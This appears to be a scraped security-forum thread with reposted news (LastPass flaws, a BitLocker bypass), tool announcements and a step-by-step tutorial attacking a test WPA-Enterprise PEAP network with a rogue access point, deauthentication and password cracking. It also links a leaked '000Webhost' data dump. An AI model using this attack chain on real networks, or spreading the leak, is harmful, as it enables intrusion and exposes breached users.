Nytro

Small toolkit for easy creation and usage of various python scripts that work with embedded devices. core - contains most of toolkits basic functions databases - contains databases, like default credentials etc. interface - contains code that is being used for the creation and manipulation with interface modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored. decryptors exploits harvesters misc scanners [*]output - output goes here This is still heavy work-in progress Link: https://github.com/j91321/rext

Flaws found in LastPass password manager by security researchers David Bisson November 17, 20159:30 pm Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015. In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside. Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doingSHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived." After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, and which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP. Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. (The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain’s context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials." For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk. At first glance, these bugs with LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team have at least responded to the findings in what seems to be a responsible and timely manner: We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours. "We want to point out that the security team at LastPass responded very quickly to all our reports and lot of the issues were fixed in just a couple days," the pair explain. "It was very easy to communicate and work with them." Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will therefore not resurface going forward. Sursa: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/

Researcher Demonstrates Simple BitLocker Bypass By SecurityWeek News on November 18, 2015 BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims. With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also being used to safely store its secret key for the full-disk encryption. A TPM is a hardware chip designed to performing cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require re-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key. One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass the Kerberos authentication and to decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it. To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled “mock" domain controller. By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives. According to the researcher, in this scenario, the attacker does not know the user password and the machine password, although it controls both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the password change Kerberos protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker. “This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds,” the researcher explained. Microsoft resolved the vulnerability in last week’s set of patches (Patch Tuesday) by adding an additional authentication check and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT or Windows RT 8.1, the company explains in a security bulletin. Sursa: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com

Thanks, tehnic vorbind, nu contine nimic Practic, nici partea a II-a nu acopera "shellcodes", dar in partea a III-a, sper eu, multi vor putea intelege cum se scriu.

Introduction to Windows shellcode development – Part 1 October 30, 2015 Ionut Popescu This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already made shellcode to perform custom functionality that you need. Introduction Let’s say you have a working exploit in Internet Explorer or Flash Player that openscalc.exe. This isn’t really useful, is it? What you really want is to execute some remote commands or to do other useful functionality.In this situation you may want to use standard existing shellcode as the ones from Shell Storm database or generated by from Metasploit’s msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits. Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/

Link: Oferta: dam tot 13 noiembrie - DOMO.ro Info: Domo isi va inchide toate magazinele - surse - IT - HotNews.ro Edit: Nu e cine stie ce.

000Webhost Data Dump https://000webhost.thecthulhu.com/

Ashampoo Burning Studio 2016 (alternativa Nero) – Licenta GRATUITA By Radu FaraVirusi(com) on November 15, 2015 Ashampoo Burning Studio 2016 este un program excelent pentru inscriptionarea CD\DVD\Blu-Ray. Este de asemenea un bun inlocuitor pentru clasicul Nero Burning Room, care are cateva dezavantaje printre care: NU este gratuit si are o multime de programele inutile care se instaleaza odata cu programul principal, ocupand spatiu si resurse. Acum puteti obtine acest software complet GRATUIT. Programul costa in mod normal 50$ si ofera multe functii (iar noutatile aduse in versiunea 2016 sunt subliniate): High DPI aware Suport pentru formatul audio OPE Suport pentru formatul audio APE Acces rapid la functii prin jump list (Windows 7 si urmatoarele) Arhivare permanenta prin tehnologia M-DISC Integrare superioara in Windows 10 cu suport pentru notificari crearea CD\DVD\Blu-Ray de tip Data functie de Backup\Restore realizare de DVD-Video, Video CD si Super Video CD copiere CD\DVD\Blu-Ray inscriptionare si crearea de imagini .iso, .cue\bin, ashdisc crearea de CD-uri Audio si MP3 plus Ripping Creeaza si imprima etichete si coperti pentru disc-urile tale Iata cum obtineti licenta GRATUITA: Accesati site-ul de mai jos pentru a obtine codul de inregistrare: https://www.ashampoo.com/frontend/registration/php/trial_step1.php?session_langid=2&edition_id=lhm40nql56aiecrchpy5oudw1tszrby0&ref=linktarget Descarcati produsul de aici: https://cdn2.ashampoo.net/public/ashglob/4610/ashampoo_burning_studio_2016_21653.exe Via: http://www.faravirusi.com/2015/11/15/ashampoo-burning-studio-2016-alternativa-nero-licenta-gratuita/

[h=1]Wifi Channel Picker[/h] find the best channel for your Wifi router Wifi Channel Picker enables you to analyze your Wifi connection and find out which channel will have the least amount of interference from other access point around you. The program can be very useful if your Wifi connected is impacted by interference from other close-by access points, e.g. in an apartment building. When you start Wifi Channel Picker, it will first display a list of all access points that are within reach of your signal. It displays them along with detailed information, including the estimated distance of the access point. You can then select the access point you want to analyze and the program will bring up a short report that suggests the best channel to use for your Wifi access point. XP/Vista/7/8/10 Portable [h=3]Product Details[/h] [TABLE] [TR] [TD=class: title]Publisher[/TD] [TD=class: data]VisionIT [/TD] [TD=class: title]Price [/TD] [TD=class: data]Free [/TD] [/TR] [TR] [TD=class: title]Version[/TD] [TD=class: data]2.0.2.1 [/TD] [TD=class: title]Last updated[/TD] [TD=class: data]Nov 13, 2015[/TD] [/TR] [TR] [TD=class: title]File Size[/TD] [TD=class: data] 104 Kb [/TD] [TD=class: title]Requirements[/TD] [TD=class: data]None[/TD] [/TR] [/TABLE] Sursa: Wifi Channel Picker Freeware - Trusted download and reviews from SnapFiles

[h=1]Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei[/h] de Raluca Abrihan 12 noiembrie 2015 16.50 Agentia interactiva 2Fresh a anuntat lansarea Digitaljob.ro, o platforma de recrutare de nisa, dedicata exclusiv industriei digitale si IT din Romania, in urma unei investitii de 30.000 de euro. Platfoma se adreseaza companiilor si specialistilor care activeaza in domeniul dezvoltarii online, mobile, software, gaming, precum si advertising sau marketing. In prezent, companiile isi pot anunta gratuit pozitiile disponibile pe Digitaljob.ro, urmand cadin primul trimestru lui 2016, platforma sa perceapa un fee din partea companiilor, pentru fiecare job plasat. Aproape 120 de companii au apelat, deja, la serviciile platformei, pentru gasirea candidatilor, sustin reprezentantii Digitaljob.ro. In ceea ce priveste numarul de anunturi publicate pana in prezent, acesta se ridica la 200, generand un numar total de 900 de aplicanti.In acest moment, pe Digitaljob.ro sunt active peste 100 de anunturi, iar cele mai multe dintre acestea, peste 59%, sunt pentru programatori, urmate de designeri, cu 30% din total, marketeri - 7% si management - aproximativ 4%. In urmatoarele 6 luni, reprezentantii platformei urmaresc atragerea mai multor angajatori si cresterea numarului de locuri de munca active cu pana la 150%. Ideea de a lansa o platforma de nisa, dedicata acestei industrii, a venit in urma mai multor incercari esuate ale agentiei 2Fresh de a gasi angajatii potriviti prin metodele existente de recrutare, pe platformele generaliste de joburi si cu ajutorul social media, conform declaratiilor lui Marius Dascalu, Stratey and Creative Director 2Fresh. Sursa: Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei - Idei - StartupCafe.ro

Monday, March 3, 2014 Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part II By Tony Lee Introduction In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup. WEP: http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html WPA-PSK:SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-PSK Hidden SSID: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - Hidden SSID MAC Filtering: http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-MACFiltering.html WPA-Enterprise Part I:SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP). Figure 1: Our setup Consult our previous article WEPfor the following topics as they are omitted from this article due to similarity: Equipment Hardware Software [*]Tips and tricks Version of Workstation Screen Resolution Simple Text Editor [*]Connecting the USB Device Outline Preparation WPA-Enterprise Refresher Discovery Attack PEAP and EAP-TLS Explained Install the Software freeradius-server-2.1.12 freeradius-wpe patch hostapd v2.0 [*]Start the RADIUS Server [*]Start the Fake AP [*]Deauthenticate the Client [*]Brute-force the Credentials MSCHAPv2 EAPMD5 [*]Connect [*]Countermeasures [*]Conclusion Preparation NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time. [TABLE] [TR] [TD]root@kali:~# service network-manager stop [ ok ] Stopping network connection manager: NetworkManager.[/TD] [/TR] [/TABLE] WPA-Enterprise Refresher We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turn over. So what is the alternative? WPA-Enterprise of course! WPA-Enterprise is ideal for large organizations because it does not use a single shared key in which all users use to connect to the wireless network. Each user has their own account (usually username and password) that they use to authenticate to the network. Best of all these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through. The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double edge sword though as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip non-bolded as they are present to be complete): LEAP - Lightweight EAP Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol. “[P]roprietary wireless LAN authentication method developed by Cisco Systems” “LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected.” “Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking.” Source: http://en.wikipedia.org/wiki/Lightweight_Extensible_Authentication_Protocol [*]EAP-MD5 Credentials are sent without SSL protection, but MD5 hashed. “It offers minimal security; the MD5 hash function is vulnerable to dictionary attacks, and does not support key generation, which makes it unsuitable for use with dynamic WEP, or WPA/WPA2 enterprise.” Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-MD5 [*]PEAP - (Protected EAP) “[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel” “Jointly developed by Cisco Systems, Microsoft, and RSA Security.” “Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server” Source: http://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol Most common inner authentication protocols are MSCHAPv2 and GTC (tokens) [*]EAP-TLS - (EAP-Transport Layer Security) “ses PKI to secure communication to a RADIUS authentication server or another type of authentication server.” “Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software.” Requires client-side certificate, which prevents many organizations from using it. Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-TLS [*]EAP-FAST - (Flexible Authentication via Secure Tunneling) “[A] protocol proposal by Cisco Systems as a replacement for LEAP.” “Use of server certificates is optional in EAP-FAST.” “EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified.” “When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials.” Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-FAST Discovery (kismet) In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides. [TABLE] [TR] [TD]root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork ESSID:"CorpNetwork" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s Mode:Master Extra:tsf=000000000d674180 Extra: Last beacon: 96ms ago IE: Unknown: 000B436F72704E6574776F726B IE: Unknown: 010482840B16 IE: Unknown: 030101 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : TKIP Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : 802.1x --snip--[/TD] [/TR] [/TABLE] Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode. [TABLE] [TR] [TD]root@kali:~# airmon-ng start wlan0[/TD] [/TR] [/TABLE] We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we are obtain this information, we focus our collection efforts by locking onto the channel and AP. [TABLE] [TR] [TD]Syntax: airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT> Key: -c = Channel that the AP is on --bssid = MAC address of the AP -w = Prefix of the file name that you want to write data to <INT> = Interface we will be capturing on Attack: airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0[/TD] [/TR] [/TABLE] Figure 2: airodump-ng is detecting wireless networks From this screenshot, we will note a few items for the attack later: [TABLE] [TR] [TD]Variable name = Description: Value ============================== $ESSID = ESSID: CorpNetwork $CH = Channel: 1 $AP = AP MAC: A0:F3:C1:0C:B6:46 $VM = Victim user MAC: 24:77:03:8C:D3:44 [/TD] [/TR] [/TABLE] Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type “eapol” in the display filters. Figure 3: Wireshark Protocol Hierarchy feature After applying the filters, we see that the EAP type is Protected EAP (PEAP). Figure 4: EAP type is PEAP Attack Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS. PEAP and EAP-TLS Explained Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP. The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server. Figure 5: Normal operation in which client is connected to legitimate network In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attackers RADIUS server. Figure 6: After wireless client is deauthenticated, the client will hopefully connect to our fake access point This should yield the information necessary to begin a brute force attack of the credentials. Let’s look at the detailed steps that are required in getting this setup in our environment. Our steps taken with this setup are outlined below: Install the Software Start the RADIUS Server Start the Fake AP Deauthenticate the Client Brute-force the Credentials Install the Software This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is: freeradius-server-2.1.12 freeradius-wpe (Wireless Pwnage Edition) patch hostapd v2.0 We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root: [TABLE] [TR] [TD]wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch tar -jxvf freeradius-server-2.1.12.tar.bz2 cd freeradius-server-2.1.12 patch -p1 < ../freeradius-wpe.patch ./configure make make install ldconfig[/TD] [/TR] [/TABLE] Explanation of the commands above: The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application. After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see “FreeRADIUS-WPE” in the banner. [TABLE] [TR] [TD]root@kali:~/freeradius-server-2.1.12# radiusd -v radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02 --snip--[/TD] [/TR] [/TABLE] The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure: [TABLE] [TR] [TD]wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz tar -zxvf hostapd-2.0.tar.gz cd hostapd-2.0/ cd hostapd/ cp defconfig .config apt-get install libnl-dev apt-get update apt-get install libssl-dev make && make install[/TD] [/TR] [/TABLE] Explanation of the commands above: The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab necessary libraries and finally the last command compiles and installs the binaries. After all the software is installed, we can start the attack. Start the RADIUS Server We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass through authentication. The file we needed to edit is: /usr/local/etc/raddb/modules/mschap We had to make sure the line “with_ntdomain_hack” was set to yes and uncommented as shown below: [TABLE] [TR] [TD] # Windows sends us a username in the form of # DOMAIN\user, but sends the challenge response # based on only the user portion. This hack # corrects for that incorrect behavior. # with_ntdomain_hack = yes[/TD] [/TR] [/TABLE] When that line is commented we received the following error message: “Could not recover last 2 bytes of hash from the challenge/response.” Figure 7: Error message when “with_ntdomain_hack” was not set to yes Now that we have the configuration file modified, we should be ready to start radiusd. [TABLE] [TR] [TD]Syntax: radiusd -X Key: -X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".[/TD] [/TR] [/TABLE] The screenshot below shows the expected behavior of running “radiusd -X”. The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step. Figure 8: radiusd is ready to process requests Start the Fake AP If we want to trick the victim to connect to our setup, we need a fake access point. This can be a hardware based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file. Feel free to use our example file below to get you started: [TABLE] [TR] [TD]interface=wlan0 driver=nl80211 ssid=CorpNetwork logger_stdout=-1 logger_stdout_level=0 dump_file=/tmp/hostapd.dump ieee8021x=1 eapol_key_index_workaround=0 own_ip_addr=127.0.0.1 auth_server_addr=127.0.0.1 auth_server_port=1812 auth_server_shared_secret=testing123 wpa=2 wpa_key_mgmt=WPA-EAP channel=1 wpa_pairwise=TKIP CCMP[/TD] [/TR] [/TABLE] After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below: [TABLE] [TR] [TD]Syntax: hostapd <configuration file> Syntax: hostapd ./hostapd.conf [/TD] [/TR] [/TABLE] After running hostapd, your screen should look like the following screenshot: Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client Deauthenticate the Client Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them to connect to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials. In our example, the victim information found during the discovery phase is summarized below: [TABLE] [TR] [TD]Variable name = Description: Value ============================== $ESSID = ESSID: CorpNetwork $CH = Channel: 1 $AP = AP MAC: A0:F3:C1:0C:B6:46 $VM = Victim user MAC: 24:77:03:8C:D3:44 [/TD] [/TR] [/TABLE] Now, let’s knock the victim off the wireless network using aireplay’s deauthentication attack. [TABLE] [TR] [TD]Syntax: aireplay-ng -0 25 -a <AP> -c < VICTIM_MAC> <INT> Key: -0 = (same as --deauth) deauthentication attack -a = MAC address of the AP -c = Victim MAC address <INT> = Interface we will be attacking from Attack: aireplay-ng -0 25 -a $AP -c $VM mon0[/TD] [/TR] [/TABLE] If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file: [TABLE] [TR] [TD]root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log[/TD] [/TR] [/TABLE] The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user’s password shown in the next section. Figure 10: The user’s authentication will fail, but we will have the challenge/response needed to crack the password Brute-force the Credentials Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start as it is almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below: [TABLE] [TR] [TD]root@kali:/usr/share/wordlists# ls rockyou.txt.gz root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz root@kali:/usr/share/wordlists# ls rockyou.txt root@kali:/usr/share/wordlists# wc -l rockyou.txt 14344392 rockyou.txt[/TD] [/TR] [/TABLE] MSCHAPv2 Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright’s asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W): [TABLE] [TR] [TD]Syntax: root@kali:~# asleap asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> asleap: Must supply an interface with -i, or a stored file with -r Usage: asleap [options] -r Read from a libpcap file -i Interface to capture on -f Dictionary file with NT hashes -n Index file for NT hashes -s Skip the check to make sure authentication was successful -h Output this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit -C Challenge value in colon-delimited bytes -R Response value in colon-delimited bytes -W ASCII dictionary file (special purpose) Attack: root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt[/TD] [/TR] [/TABLE] The asleap tool is very fast. It found our password of “cheekymonkeyrox” in just seconds because it is present as-is within the rockyou password list. Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords as discussed in previous articles. For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger: [TABLE] [TR] [TD]Generate permutations with JTR: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout Feed JTR permutations into asleap: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE> Example: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -[/TD] [/TR] [/TABLE] EAP-MD5 If the inner authentication protocol is EAP-MD5 use the eapmd5pass tool: [TABLE] [TR] [TD]Syntax: root@kali:~# eapmd5pass eapmd5pass - Dictionary attack against EAP-MD5 Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options] -i <iface> interface name -r <pcapfile> read from a named libpcap file -w <wordfile> use wordfile for possible passwords. -b <bssid> BSSID of target network (default: all) -U <username> Username of EAP-MD5 user. -C <chal> EAP-MD5 challenge value. -R <response> EAP-MD5 response value. -E <eapid> EAP-MD5 response EAP ID value. -v increase verbosity level (max 3) -V version information -h usage information The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means. Attack: root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap[/TD] [/TR] [/TABLE] For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger: [TABLE] [TR] [TD]Generate permutations with JTR: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout Feed JTR permutations into eapmd5pass: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP> Example: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap[/TD] [/TR] [/TABLE] Connect Now that we have recovered the credentials, we will connect to the AP using the configuration files below: [TABLE] [TR] [TD]Check the status of the card: root@kali:~# iwconfig wlan0 Enter the network information: root@kali:~# iwconfig wlan0 essid "QX3A7" Bring the Interface up: root@kali:~# ifconfig wlan0 up Create wpa_supplicant file: network={ ssid="CorpNetwork" scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP identity="TonyTestUser" password="cheekymonkeyrox" phase1="peaplabel=0" phase2="auth=MSCHAPV2" } Run the wpa_supplicant: root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf Obtain an IP: root@kali:~# dhclient wlan0 Reloading /etc/samba/smb.conf: smbd only. Verify an IP is obtained: root@kali:~# ifconfig wlan0[/TD] [/TR] [/TABLE] Countermeasures Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration. For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CA’s, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below. Figure 12: Wireless client settings for PEAP Conclusion In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated. If you try this with different cards and run into issues, check the following excellent resource: http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues Props Thomas d'Otreppe for the ever critical aircrack-ng software suite Josh Wright and Brad Antoniewicz for great work on freeradius-WPE Josh Wright for asleap and eapmd5pass Jouni Malinen <j@w1.fi> and contributors for hostapd Offensive security group for Kali Linux Dan Dumond for the sanity check and proof read Posted by Tony Lee at 3:00 AM Sursa: http://securitysynapse.blogspot.ro/2014/03/wireless-pentesting-on-cheap-kali-WPAEntPartII.html

Security Hub - The IT Security Professionals Social Network Link: https://securityhub.io/index.php Pareri? Sugestii?

Pe intelesul tuturor: BILETE GRATIS LA DEFCAMP. Link: DefCamp2015 Raffle | Cazacu Bogdan

Atat, Gigi Becali prim ministru!

Violenta?

